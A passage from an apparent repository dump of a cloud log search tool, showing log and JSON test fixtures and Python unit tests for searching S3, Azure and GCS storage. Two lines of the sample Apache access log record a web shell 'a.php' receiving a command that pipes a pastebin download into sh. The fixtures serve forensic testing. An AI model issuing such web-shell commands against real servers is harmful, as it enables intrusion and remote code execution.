49 | 185.220.101.194 - - [19/Jul/2020:20:43:05 +0000] "GET /icons/image2.gif HTTP/1.1" 200 594 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
50 | 185.220.101.194 - - [19/Jul/2020:20:43:07 +0000] "GET /wp-content/plugins/uploads/a.php HTTP/1.1" 200 384 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
51 | 185.220.101.194 - - [19/Jul/2020:20:43:07 +0000] "GET /wp-content/plugins/uploads/a.php HTTP/1.1" 200 384 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
52 | 185.220.101.194 - - [19/Jul/2020:20:43:45 +0000] "GET /wp-content/plugins/uploads/a.php?cmd=curl%20https://pastebin.com/raw/NKnTWdsk%20|%20sh HTTP/1.1" 200 392 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
53 | 185.220.101.194 - - [19/Jul/2020:20:44:08 +0000] "GET /wp-content/plugins/uploads/a.php?cmd=curl%20http://pastebin.com/raw/rsdzW7C7%20|%20sh HTTP/1.1" 200 392 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
54 | 185.220.101.194 - - [19/Jul/2020:20:46:20 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
55 | 


--------------------------------------------------------------------------------
/tests/data/azure.json:
--------------------------------------------------------------------------------
 1 | [
 2 |     {
 3 |       "data": {
 4 |         "authorization": {
 5 |           "action": "Microsoft.Storage/storageAccounts/listKeys/action",
 6 |           "scope": "/subscriptions/ji12gbh3jh12b3h12vb3hv123h/resourceGroups/test/providers/Microsoft.Storage/storageAccounts/storagetest"
 7 |         },
 8 |         "caller": "test@email",
 9 |         "channels": "Operation",
10 |         "claims": {
11 |           "aud": "https://management.core.windows.net/",
12 |           "ver": "1.0",
13 |           "xms_cae": "1",
14 |           "xms_tcdt": "1231293743"
15 |         },
16 |         "correlationId": "b12321j3bhdgscj214j3b12rhv",
17 |         "description": "",
18 |         "eventDataId": "21371283ghjgfsdb9876123",
19 |         "eventName": {
20 |           "value": "EndRequest",
21 |           "localizedValue": "End request"
22 |         },
23 |         "httpRequest": {
24 |           "clientRequestId": "9dsfghj1290-381293ghu123gvh123",
25 |           "clientIpAddress": "11.11.11.10",
26 |           "method": "POST",
27 |           "uri": "https://management.azure.com/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/listKeys?api-version=2022-05-01"
28 |         },
29 |         "id": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/events/21371283ghjgfsdb9876123/ticks/2193871283612873612",
30 |         "level": "Informational",
31 |         "resourceGroupName": "Test",
32 |         "resourceProviderName": {
33 |           "value": "Microsoft.Storage",
34 |           "localizedValue": "Microsoft.Storage"
35 |         },
36 |         "resourceId": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest",
37 |         "operationId": "ac8a903f-315d-421a-8533-84ed10b356cd",
38 |         "operationName": {
39 |           "value": "Microsoft.Storage/storageAccounts/listKeys/action",
40 |           "localizedValue": "List Storage Account Keys"
41 |         },
42 |         "status": {
43 |           "value": "Succeeded",
44 |           "localizedValue": "Succeeded"
45 |         },
46 |         "subStatus": {
47 |           "value": "OK",
48 |           "localizedValue": "OK (HTTP Status Code: 200)"
49 |         },
50 |         "tenantId": "12321MN3BNDASVBfD09SFDGSD"
51 |       },
52 |       "version": 1,
53 |       "eventId": "21371283ghjgfsdb9876123",
54 |       "eventType": "AZURE_CLOUD"
55 |     }
56 |   ]


--------------------------------------------------------------------------------
/tests/data/azure_singleline.json:
--------------------------------------------------------------------------------
 1 | [
 2 |     {
 3 |       "data": {
 4 |         "authorization": {
 5 |           "action": "Microsoft.Storage/storageAccounts/listKeys/action",
 6 |           "scope": "/subscriptions/ji12gbh3jh12b3h12vb3hv123h/resourceGroups/test/providers/Microsoft.Storage/storageAccounts/storagetest"
 7 |         },
 8 |         "caller": "test@email",
 9 |         "channels": "Operation",
10 |         "claims": {
11 |           "aud": "https://management.core.windows.net/",
12 |           "ver": "1.0",
13 |           "xms_cae": "1",
14 |           "xms_tcdt": "1231293743"
15 |         },
16 |         "correlationId": "b12321j3bhdgscj214j3b12rhv",
17 |         "description": "",
18 |         "eventDataId": "21371283ghjgfsdb9876123",
19 |         "eventName": {
20 |           "value": "EndRequest",
21 |           "localizedValue": "End request"
22 |         },
23 |         "httpRequest": {
24 |           "clientRequestId": "9dsfghj1290-381293ghu123gvh123",
25 |           "clientIpAddress": "11.11.11.10",
26 |           "method": "POST",
27 |           "uri": "https://management.azure.com/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/listKeys?api-version=2022-05-01"
28 |         },
29 |         "id": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/events/21371283ghjgfsdb9876123/ticks/2193871283612873612",
30 |         "level": "Informational",
31 |         "resourceGroupName": "Test",
32 |         "resourceProviderName": {
33 |           "value": "Microsoft.Storage",
34 |           "localizedValue": "Microsoft.Storage"
35 |         },
36 |         "resourceId": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest",
37 |         "operationId": "ac8a903f-315d-421a-8533-84ed10b356cd",
38 |         "operationName": {
39 |           "value": "Microsoft.Storage/storageAccounts/listKeys/action",
40 |           "localizedValue": "List Storage Account Keys"
41 |         },
42 |         "status": {
43 |           "value": "Succeeded",
44 |           "localizedValue": "Succeeded"
45 |         },
46 |         "subStatus": {
47 |           "value": "OK",
48 |           "localizedValue": "OK (HTTP Status Code: 200)"
49 |         },
50 |         "tenantId": "12321MN3BNDASVBfD09SFDGSD"
51 |       },
52 |       "version": 1,
53 |       "eventId": "21371283ghjgfsdb9876123",
54 |       "eventType": "AZURE_CLOUD"
55 |     }
56 |   ]


--------------------------------------------------------------------------------
/tests/data/bad_azure.json:
--------------------------------------------------------------------------------
 1 | [
 2 |   {
 3 |     "data": {
 4 |       "authorization": {
 5 |         "action": "Microsoft.Storage/storageAccounts/listKeys/action",
 6 |         "scope": "/subscriptions/ji12gbh3jh12b3h12vb3hv123h/resourceGroups/test/providers/Microsoft.Storage/storageAccounts/storagetest"
 7 |       },
 8 |       "caller": "test@email",
 9 |       "channels": "Operation",
10 |       "claims": {
11 |         "aud": "https://management.core.windows.net/",
12 |         "ver": "1.0",
13 |         "xms_cae": "1",
14 |         "xms_tcdt": "1231293743"
15 |       },
16 |       "correlationId": "b12321j3bhdgscj214j3b12rhv",
17 |       "description": "",
18 |       "eventDataId": "21371283ghjgfsdb9876123",
19 |       "eventName": {
20 |         "value": "EndRequest",
21 |         "localizedValue": "End request"
22 |       },
23 |       "httpRequest": {
24 |         "clientRequestId": "9dsfghj1290-381293ghu123gvh123",
25 |         "clientIpAddress": "11.11.11.10",
26 |         "method": "POST",
27 |         "uri": "https://management.azure.com/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/listKeys?api-version=2022-05-01"
28 |       },
29 |       "id": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/events/21371283ghjgfsdb9876123/ticks/2193871283612873612",
30 |       "level": "Informational",
31 |       "resourceGroupName": "Test",
32 |       "resourceProviderName": {
33 |         "value": "Microsoft.Storage",
34 |         "localizedValue": "Microsoft.Storage"
35 |       },
36 |       "resourceId": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest",
37 |       "operationId": "ac8a903f-315d-421a-8533-84ed10b356cd",
38 |       "operationName": {
39 |         "value": "Microsoft.Storage/storageAccounts/listKeys/action",
40 |         "localizedValue": "List Storage Account Keys"
41 |       },
42 |       "status": {
43 |         "value": "Succeeded",
44 |         "localizedValue": "Succeeded"
45 |       },
46 |       "subStatus": {
47 |         "value": "OK",
48 |         "localizedValue": "OK (HTTP Status Code: 200)"
49 |       },
50 |       "tenantId": "12321MN3BNDASVBfD09SFDGSD"
51 |     },
52 |     "version": 1,
53 |     "eventId": "21371283ghjgfsdb9876123",
54 |     "eventType": "AZURE_CLOUD"
55 |   
56 | ]


--------------------------------------------------------------------------------
/tests/data/bad_cloudtrail.json:
--------------------------------------------------------------------------------
 1 | {"Records": [{
 2 |     "eventVersion": "1.08",
 3 |     "userIdentity": {
 4 |         "type": "IAMUser",
 5 |         "principalId": "EXAMPLE6E4XEGITWATV6R",
 6 |         "arn": "arn:aws:iam::777788889999:user/Nikki",
 7 |         "accountId": "777788889999",
 8 |         "accessKeyId": "AKIAI44QH8DHBEXAMPLE",
 9 |         "userName": "Nikki",
10 |         "sessionContext": {
11 |             "sessionIssuer": {},
12 |             "webIdFederationData": {},
13 |             "attributes": {
14 |                 "creationDate": "2023-07-19T21:11:57Z",
15 |                 "mfaAuthenticated": "false"
16 |             }
17 |         }
18 |     },
19 |     "eventTime": "2023-07-19T21:14:20Z",
20 |     "eventSource": "ec2.amazonaws.com",
21 |     "eventName": "StopInstances",
22 |     "awsRegion": "us-east-1",
23 |     "sourceIPAddress": "192.0.2.0",
24 |     "userAgent": "aws-cli/2.13.5 Python/3.11.4 Linux/4.14.255-314-253.539.amzn2.x86_64 exec-env/CloudShell exe/x86_64.amzn.2 prompt/off command/ec2.stop-instances",
25 |     "requestParameters": {
26 |         "instancesSet": {


--------------------------------------------------------------------------------
/tests/data/cloudtrail.json:
--------------------------------------------------------------------------------
 1 | {"Records": [{
 2 |     "eventVersion": "1.08",
 3 |     "userIdentity": {
 4 |         "type": "IAMUser",
 5 |         "principalId": "EXAMPLE6E4XEGITWATV6R",
 6 |         "arn": "arn:aws:iam::777788889999:user/Nikki",
 7 |         "accountId": "777788889999",
 8 |         "accessKeyId": "AKIAI44QH8DHBEXAMPLE",
 9 |         "userName": "Nikki",
10 |         "sessionContext": {
11 |             "sessionIssuer": {},
12 |             "webIdFederationData": {},
13 |             "attributes": {
14 |                 "creationDate": "2023-07-19T21:11:57Z",
15 |                 "mfaAuthenticated": "false"
16 |             }
17 |         }
18 |     },
19 |     "eventTime": "2023-07-19T21:14:20Z",
20 |     "eventSource": "ec2.amazonaws.com",
21 |     "eventName": "StopInstances",
22 |     "awsRegion": "us-east-1",
23 |     "sourceIPAddress": "192.0.2.0",
24 |     "userAgent": "aws-cli/2.13.5 Python/3.11.4 Linux/4.14.255-314-253.539.amzn2.x86_64 exec-env/CloudShell exe/x86_64.amzn.2 prompt/off command/ec2.stop-instances",
25 |     "requestParameters": {
26 |         "instancesSet": {
27 |             "items": [
28 |                 {
29 |                     "instanceId": "i-EXAMPLE56126103cb"
30 |                 },
31 |                 {
32 |                     "instanceId": "i-EXAMPLEaff4840c22"
33 |                 }
34 |             ]
35 |         },
36 |         "force": false
37 |     },
38 |     "responseElements": {
39 |         "requestId": "c308a950-e43e-444e-afc1-EXAMPLE73e49",
40 |         "instancesSet": {
41 |             "items": [
42 |                 {
43 |                     "instanceId": "i-EXAMPLE56126103cb",
44 |                     "currentState": {
45 |                         "code": 64,
46 |                         "name": "stopping"
47 |                     },
48 |                     "previousState": {
49 |                         "code": 16,
50 |                         "name": "running"
51 |                     }
52 |                 },
53 |                 {
54 |                     "instanceId": "i-EXAMPLEaff4840c22",
55 |                     "currentState": {
56 |                         "code": 64,
57 |                         "name": "stopping"
58 |                     },
59 |                     "previousState": {
60 |                         "code": 16,
61 |                         "name": "running"
62 |                     }
63 |                 }
64 |             ]
65 |         }
66 |     },
67 |     "requestID": "c308a950-e43e-444e-afc1-EXAMPLE73e49",
68 |     "eventID": "9357a8cc-a0eb-46a1-b67e-EXAMPLE19b14",
69 |     "readOnly": false,
70 |     "eventType": "AwsApiCall",
71 |     "managementEvent": true,
72 |     "recipientAccountId": "777788889999",
73 |     "eventCategory": "Management",
74 |      "tlsDetails": {
75 |         "tlsVersion": "TLSv1.2",
76 |         "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
77 |         "clientProvidedHostHeader": "ec2.us-east-1.amazonaws.com"
78 |     },
79 |     "sessionCredentialFromConsole": "true"
80 | }]}


--------------------------------------------------------------------------------
/tests/data/cloudtrail_singleline.json:
--------------------------------------------------------------------------------
1 | {"Records":[{"eventVersion":"1.07","userIdentity":{"type":"AWSService","invokedBy":"cloudtrail.amazonaws.com"},"eventTime":"2020-07-31T23:58:37Z","eventSource":"s3.amazonaws.com","eventName":"PutObject","awsRegion":"us-east-1","sourceIPAddress":"cloudtrail.amazonaws.com","userAgent":"cloudtrail.amazonaws.com","requestParameters":{"bucketName":"some-bucket","Host":"some-bucket.s3.us-east-1.amazonaws.com","x-amz-acl":"bucket-owner-full-control","x-amz-server-side-encryption":"AES256","key":"AWSLogs/001/CloudTrail/us-east-1/2020/07/31/001_CloudTrail_us-east-1_20200731T2355Z_CPLMUNn9xXPXF33D.json.gz"},"responseElements":{"x-amz-server-side-encryption":"AES256"},"additionalEventData":{"SignatureVersion":"SigV4","CipherSuite":"ECDHE-RSA-AES128-SHA","bytesTransferredIn":791.0,"SSEApplied":"SSE_S3","AuthenticationMethod":"AuthHeader","x-amz-id-2":"rIbGKbhONVn+srdOdwCMERdRiHHFSgs8lvCJdFyCnR8O/r0KnwMQxPayr0rpNm/TlpfjFSLmZgw=","bytesTransferredOut":0.0},"requestID":"4C47E7CE1CBA28F9","eventID":"25d2f1da-c4ac-4201-9c97-e50869d6a636","readOnly":false,"resources":[{"type":"AWS::S3::Object","ARN":"arn:aws:s3:::some-bucket/AWSLogs/001/CloudTrail/us-east-1/2020/07/31/001_CloudTrail_us-east-1_20200731T2355Z_CPLMUNn9xXPXF33D.json.gz"},{"accountId":"001","type":"AWS::S3::Bucket","ARN":"arn:aws:s3:::some-bucket"}],"eventType":"AwsApiCall","managementEvent":false,"recipientAccountId":"001","sharedEventID":"d3a02cbc-7a82-4248-a81b-90074c2579a6","eventCategory":"Data"}]}


--------------------------------------------------------------------------------
/tests/data/yara.rule:
--------------------------------------------------------------------------------
1 | rule get
2 | {
3 |     strings:
4 |         $get = "GET" nocase wide ascii
5 |     condition:
6 |         $get
7 | }


--------------------------------------------------------------------------------
/tests/test_unit.py:
--------------------------------------------------------------------------------
  1 | """
  2 | Basic unit tests for Cloud Grep
  3 | python3 -m unittest discover tests
  4 | """
  5 | 
  6 | import unittest
  7 | import os
  8 | import boto3
  9 | from google.cloud import storage  # type: ignore
 10 | import timeout_decorator
 11 | from moto import mock_aws
 12 | from datetime import datetime
 13 | from unittest.mock import patch, MagicMock
 14 | import yara  # type: ignore
 15 | from io import StringIO
 16 | from typing import List, BinaryIO
 17 | import json
 18 | import sys
 19 | import csv
 20 | 
 21 | from cloudgrep.cloud import Cloud
 22 | from cloudgrep.search import Search
 23 | from cloudgrep.cloudgrep import CloudGrep
 24 | 
 25 | 
 26 | BASE_PATH = os.path.dirname(os.path.realpath(__file__))
 27 | 
 28 | 
 29 | class CloudGrepTests(unittest.TestCase):
 30 |     """Tests for Cloud Grep"""
 31 | 
 32 |     def test_weird_files(self) -> None:
 33 |         for filename in os.listdir(f"{BASE_PATH}/data/"):
 34 |             # Just checks we don't crash on any files
 35 |             Search().get_all_strings_line(f"{BASE_PATH}/data/" + filename)
 36 | 
 37 |         self.assertIn("SomeLine", Search().get_all_strings_line(f"{BASE_PATH}/data/14_3.log"))
 38 | 
 39 |     def test_gzip(self) -> None:
 40 |         found = Search().search_file(f"{BASE_PATH}/data/000000.gz", "000000.gz", ["Running on machine"], False, None)
 41 |         self.assertTrue(found)
 42 | 
 43 |     def test_zip(self) -> None:
 44 |         found = Search().search_file(f"{BASE_PATH}/data/000000.zip", "000000.zip", ["Running on machine"], False, None)
 45 |         self.assertTrue(found)
 46 | 
 47 |     def test_print_match(self) -> None:
 48 |         with patch("sys.stdout", new=StringIO()) as fake_out:
 49 |             Search().search_file(f"{BASE_PATH}/data/000000.zip", "000000.zip", ["Running on machine"], False, None)
 50 |             output = fake_out.getvalue().strip()
 51 |         self.assertIn("Running on machine", output)
 52 | 
 53 |     @timeout_decorator.timeout(5)
 54 |     @mock_aws
 55 |     def test_e2e(self) -> None:
 56 |         # This test uploads a couple of logs to mock s3
 57 |         # Then searches them
 58 |         _BUCKET = "mybucket"
 59 |         _QUERY = ["SomeLine"]
 60 | 
 61 |         conn = boto3.resource("s3", region_name="us-east-1")
 62 |         conn.create_bucket(Bucket=_BUCKET)
 63 |         s3 = boto3.client("s3", region_name="us-east-1")
 64 | 
 65 |         # All contain "SomeLine"
 66 |         for file_name in ["14_3.log", "35010_7.log", "apache_access.log"]:
 67 |             with open(f"{BASE_PATH}/data/{file_name}", "rb") as data:
 68 |                 s3.upload_fileobj(data, _BUCKET, file_name)
 69 | 
 70 |         print("Checking we include every file")
 71 |         matching_keys = list(Cloud().get_objects(_BUCKET, "", None, None, None, 100000))
 72 |         self.assertEqual(len(matching_keys), 3)
 73 | 
 74 |         print(f"Checking we get 3 hits for SomeLine in: {matching_keys}")
 75 |         hits = Cloud().download_from_s3_multithread(_BUCKET, matching_keys, _QUERY, False, None)
 76 |         self.assertEqual(hits, 3)
 77 | 
 78 |         print("Testing with multiple queries from a file")
 79 |         file = "queries.txt"
 80 |         with open(file, "w") as f:
 81 |             f.write(f"query1\n{_QUERY}\nquery3")
 82 |         multi_query = CloudGrep().load_queries(file)
 83 |         hits = Cloud().download_from_s3_multithread(_BUCKET, matching_keys, multi_query, False, None)
 84 |         self.assertEqual(hits, 3)
 85 | 
 86 |         # Upload 1000 logs
 87 |         for x in range(1000):
 88 |             with open(f"{BASE_PATH}/data/apache_access.log", "rb") as data:
 89 |                 s3.upload_fileobj(data, _BUCKET, str(x))
 90 | 
 91 |         Cloud().download_from_s3_multithread(_BUCKET, matching_keys, _QUERY, False, None)
 92 | 
 93 |     def test_object_not_empty_and_size_greater_than_file_size(self) -> None:
 94 |         obj = {"last_modified": datetime(2022, 1, 1), "size": 1000, "name": "example_file.txt"}
 95 |         key_contains = "example"
 96 |         from_date = datetime(2021, 1, 1)
 97 |         to_date = datetime(2023, 1, 1)
 98 |         file_size = 500
 99 |         result = Cloud().filter_object_azure(obj, key_contains, from_date, to_date, file_size)  # type: ignore
100 |         self.assertFalse(result)
101 |         file_size = 500000
102 |         result = Cloud().filter_object_azure(obj, key_contains, from_date, to_date, file_size)  # type: ignore
103 |         self.assertTrue(result)
104 | 
105 |     def test_returns_true_if_all_conditions_are_met(self) -> None:
106 |         obj = storage.blob.Blob(name="example_file.txt", bucket="example_bucket")
107 |         key_contains = "example"
108 |         from_date = datetime(2021, 1, 1)
109 |         to_date = datetime(2023, 1, 1)
110 |         result = Cloud().filter_object_google(obj, key_contains, from_date, to_date)
111 |         self.assertTrue(result)
112 | 
113 |     def test_returns_string_with_file_contents(self) -> None:
114 |         file = "queries.txt"
115 |         with open(file, "w") as f:
116 |             f.write("query1\nquery2\nquery3")
117 |         queries = CloudGrep().load_queries(file)
118 |         self.assertIsInstance(queries, List)
119 |         self.assertEqual(queries, ["query1", "query2", "query3"])
120 | 
121 |     def test_yara(self) -> None:
122 |         file_name = "valid_file.txt"
123 |         key_name = "key_name"
124 |         hide_filenames = True
125 |         yara_rules = yara.compile(source='rule rule_name {strings: $a = "get" nocase wide ascii condition: $a}')
126 |         with open(file_name, "w") as f:
127 |             f.write("one\nget stuff\nthree")
128 | 
129 |         with patch("sys.stdout", new=StringIO()) as fake_out:
130 |             matched = Search().yara_scan_file(file_name, key_name, hide_filenames, yara_rules, True)
131 |             output = fake_out.getvalue().strip()
132 | 
133 |         self.assertTrue(matched)
134 |         self.assertEqual(output, "{'match_rule': 'rule_name', 'match_strings': [$a]}")
135 | 
136 |     def test_json_output(self) -> None:
137 |         with patch("sys.stdout", new=StringIO()) as fake_out:
138 |             Search().search_file(
139 |                 f"{BASE_PATH}/data/000000.gz", "000000.gz", ["Running on machine"], False, None, None, [], True
140 |             )
141 |             output = fake_out.getvalue().strip()
142 | 
143 |         self.assertTrue(json.loads(output))
144 | 
145 |     def test_search_cloudtrail(self) -> None:
146 |         log_format = "json"
147 |         log_properties = ["Records"]
148 |         Search().search_file(
149 |             f"{BASE_PATH}/data/bad_cloudtrail.json",
150 |             "bad_cloudtrail.json",
151 |             ["Running on machine"],
152 |             False,
153 |             None,
154 |             log_format,
155 |             log_properties,
156 |         )
157 |         Search().search_file(
158 |             f"{BASE_PATH}/data/cloudtrail.json",
159 |             "cloudtrail.json",
160 |             ["Running on machine"],
161 |             False,
162 |             None,
163 |             log_format,
164 |             log_properties,
165 |         )
166 |         with patch("sys.stdout", new=StringIO()) as fake_out:
167 |             Search().search_file(
168 |                 f"{BASE_PATH}/data/cloudtrail_singleline.json",
169 |                 "cloudtrail_singleline.json",
170 |                 ["SignatureVersion"],
171 |                 False,
172 |                 None,
173 |                 log_format,
174 |                 log_properties,
175 |                 True,
176 |             )
177 |             output = fake_out.getvalue().strip()
178 |         self.assertIn("SignatureVersion", output)
179 |         self.assertTrue(json.loads(output))
180 | 
181 |     def test_filter_object_s3_empty_file(self) -> None:
182 |         obj = {"LastModified": datetime(2023, 1, 1), "Size": 0, "Key": "empty_file.log"}
183 |         key_contains = "empty"
184 |         from_date = datetime(2022, 1, 1)
185 |         to_date = datetime(2024, 1, 1)
186 |         file_size = 10000
187 |         self.assertFalse(
188 |             Cloud().filter_object(obj, key_contains, from_date, to_date, file_size),
189 |             "Empty file should have been filtered out",
190 |         )
191 | 
192 |     def test_filter_object_s3_out_of_date_range(self) -> None:
193 |         obj = {"LastModified": datetime(2021, 1, 1), "Size": 500, "Key": "old_file.log"}
194 |         key_contains = "old"
195 |         from_date = datetime(2022, 1, 1)
196 |         to_date = datetime(2024, 1, 1)
197 |         file_size = 10000
198 |         self.assertFalse(
199 |             Cloud().filter_object(obj, key_contains, from_date, to_date, file_size),
200 |             "Object older than from_date should not match",
201 |         )
202 | 
203 |     def test_search_logs_csv_format(self) -> None:
204 |         line = "col1,col2\nval1,val2"
205 |         mock_return = [{"col1": "val1", "col2": "val2"}]
206 |         with patch.object(csv, "DictReader", return_value=mock_return):
207 |             with patch("sys.stdout", new=StringIO()) as fake_out:
208 |                 Search().search_logs(
209 |                     line,
210 |                     key_name="test_csv",
211 |                     search="val1",
212 |                     hide_filenames=False,
213 |                     log_format="csv",
214 |                     log_properties=[],
215 |                     json_output=False,
216 |                 )
217 |         self.assertIn("val1", fake_out.getvalue())
218 | 
219 |     def test_search_logs_unknown_format(self) -> None:
220 |         line = '{"foo": "bar"}'
221 |         with patch("sys.stdout", new=StringIO()):
222 |             with patch("logging.error") as mock_log:
223 |                 Search().search_logs(
224 |                     line,
225 |                     key_name="unknown_format.log",
226 |                     search="bar",
227 |                     hide_filenames=False,
228 |                     log_format="not_a_real_format",
229 |                     log_properties=[],
230 |                     json_output=False,
231 |                 )
232 |         mock_log.assert_called_once()
233 | 
234 |     @mock_aws
235 |     def test_cloudgrep_search_no_query_file(self) -> None:
236 |         s3 = boto3.resource("s3", region_name="us-east-1")
237 |         s3.create_bucket(Bucket="mybucket")
238 |         with open("small.log", "w") as f:
239 |             f.write("hello direct query")
240 |         with open("small.log", "rb") as data:
241 |             s3.Bucket("mybucket").put_object(Key="small.log", Body=data)
242 | 
243 |         cg = CloudGrep()
244 |         with patch("sys.stdout", new=StringIO()) as fake_out:
245 |             cg.search(
246 |                 bucket="mybucket",
247 |                 account_name=None,
248 |                 container_name=None,
249 |                 google_bucket=None,
250 |                 query=["hello"],
251 |                 file=None,
252 |                 yara_file=None,
253 |                 file_size=1000000,
254 |                 prefix="",
255 |                 key_contains=None,
256 |                 from_date=None,
257 |                 end_date=None,
258 |                 hide_filenames=False,
259 |                 log_type=None,
260 |                 log_format=None,
261 |                 log_properties=[],
262 |                 profile=None,
263 |                 json_output=False,
264 |             )
265 |             output = fake_out.getvalue().strip()
266 |             self.assertIn("hello direct query", output)
267 | 
268 |     @mock_aws
269 |     def test_cloudgrep_search_with_profile(self) -> None:
270 |         s3 = boto3.resource("s3", region_name="us-east-1")
271 |         s3.create_bucket(Bucket="prof-bucket")
272 |         with open("small.log", "w") as f:
273 |             f.write("Hello test profile")
274 |         with open("small.log", "rb") as data:
275 |             s3.Bucket("prof-bucket").put_object(Key="small.log", Body=data)
276 | 
277 |         with patch("boto3.setup_default_session") as mock_setup_session:
278 |             cg = CloudGrep()
279 |             cg.search(
280 |                 bucket="prof-bucket",
281 |                 account_name=None,
282 |                 container_name=None,
283 |                 google_bucket=None,
284 |                 query=["Hello"],
285 |                 file=None,
286 |                 yara_file=None,
287 |                 file_size=1000000,
288 |                 prefix="",
289 |                 key_contains=None,
290 |                 from_date=None,
291 |                 end_date=None,
292 |                 hide_filenames=False,
293 |                 log_type=None,
294 |                 log_format=None,
295 |                 log_properties=[],
296 |                 profile="my_aws_profile",
297 |                 json_output=False,
298 |             )
299 |             mock_setup_session.assert_called_with(profile_name="my_aws_profile")
300 | 
301 |     def test_main_no_args_shows_help(self) -> None:
302 |         from cloudgrep.__main__ import main
303 | 
304 |         with patch.object(sys, "argv", ["prog"]):
305 |             # Argparse prints help to sys.stderr
306 |             with patch("sys.stderr", new=StringIO()) as fake_err:
307 |                 with self.assertRaises(SystemExit):
308 |                     main()
309 |                 self.assertIn("usage: prog", fake_err.getvalue())
310 | 
311 |     @patch("cloudgrep.cloud.BlobServiceClient.from_connection_string")
312 |     def test_azure_search_mocked(self, mock_service_client: MagicMock) -> None:
313 |         # Mock azure client to do basic azure test
314 | 
315 |         container_client = MagicMock()
316 |         mock_service_client.return_value.get_container_client.return_value = container_client
317 | 
318 |         blob_mock = MagicMock()
319 |         blob_mock.name = "testblob.log"
320 |         blob_mock.size = 50
321 |         blob_mock.last_modified = datetime(2022, 1, 1)
322 |         container_client.list_blobs.return_value = [blob_mock]
323 | 
324 |         blob_client_mock = MagicMock()
325 |         container_client.get_blob_client.return_value = blob_client_mock
326 | 
327 |         # Actually written to a local file
328 |         fake_content = b"Some Azure log entry that mentions azure target"
329 | 
330 |         def fake_readinto_me(file_obj: BinaryIO) -> None:
331 |             file_obj.write(fake_content)
332 | 
333 |         blob_data_mock = MagicMock()
334 |         blob_data_mock.readinto.side_effect = fake_readinto_me
335 |         blob_client_mock.download_blob.return_value = blob_data_mock
336 | 
337 |         with patch("sys.stdout", new=StringIO()) as fake_out:
338 |             CloudGrep().search(
339 |                 bucket=None,
340 |                 account_name="fakeaccount",
341 |                 container_name="fakecontainer",
342 |                 google_bucket=None,
343 |                 query=["azure target"],  # Our search term
344 |                 file=None,
345 |                 yara_file=None,
346 |                 file_size=1000000,
347 |                 prefix=None,
348 |                 key_contains=None,
349 |                 from_date=None,
350 |                 end_date=None,
351 |                 hide_filenames=False,
352 |                 log_type=None,
353 |                 log_format=None,
354 |                 log_properties=[],
355 |                 profile=None,
356 |                 json_output=False,
357 |             )
358 |             output = fake_out.getvalue().strip()
359 | 
360 |         # Check in fake file
361 |         self.assertIn("azure target", output, "Should match the azure target text in the downloaded content")
362 | 
363 |     @patch("cloudgrep.cloud.storage.Client")
364 |     def test_google_search_mocked(self, mock_storage_client: MagicMock) -> None:
365 |         # Basic coverage for gcp search
366 |         bucket_mock = MagicMock()
367 |         mock_storage_client.return_value.get_bucket.return_value = bucket_mock
368 | 
369 |         blob_mock = MagicMock()
370 |         blob_mock.name = "test_gcs_file.log"
371 |         blob_mock.updated = datetime(2023, 1, 1)
372 |         bucket_mock.list_blobs.return_value = [blob_mock]
373 | 
374 |         def fake_download_to_filename(local_path: str) -> None:
375 |             with open(local_path, "wb") as f:
376 |                 f.write(b"This is some fake file: google target")
377 | 
378 |         blob_mock.download_to_filename.side_effect = fake_download_to_filename
379 | 
380 |         with patch("sys.stdout", new=StringIO()) as fake_out:
381 |             CloudGrep().search(
382 |                 bucket=None,
383 |                 account_name=None,
384 |                 container_name=None,
385 |                 google_bucket="fake-gcs-bucket",
386 |                 query=["google target"],
387 |                 file=None,
388 |                 yara_file=None,
389 |                 file_size=1000000,
390 |                 prefix=None,
391 |                 key_contains=None,
392 |                 from_date=None,
393 |                 end_date=None,
394 |                 hide_filenames=False,
395 |                 log_type=None,
396 |                 log_format=None,
397 |                 log_properties=[],
398 |                 profile=None,
399 |                 json_output=False,
400 |             )
401 |             output = fake_out.getvalue().strip()
402 | 
403 |         self.assertIn("google target", output, "Should match the google target text in the downloaded content")
404 | 
405 |     @mock_aws
406 |     def test_list_files_returns_pre_filtered_files(self) -> None:
407 |         """
408 |         Test that list_files() returns only the S3 objects that match
409 |         the specified filters (e.g. key substring and non‑empty content).
410 |         """
411 |         bucket_name = "list-files-test-bucket"
412 |         # Create a fake S3 bucket
413 |         s3_resource = boto3.resource("s3", region_name="us-east-1")
414 |         s3_resource.create_bucket(Bucket=bucket_name)
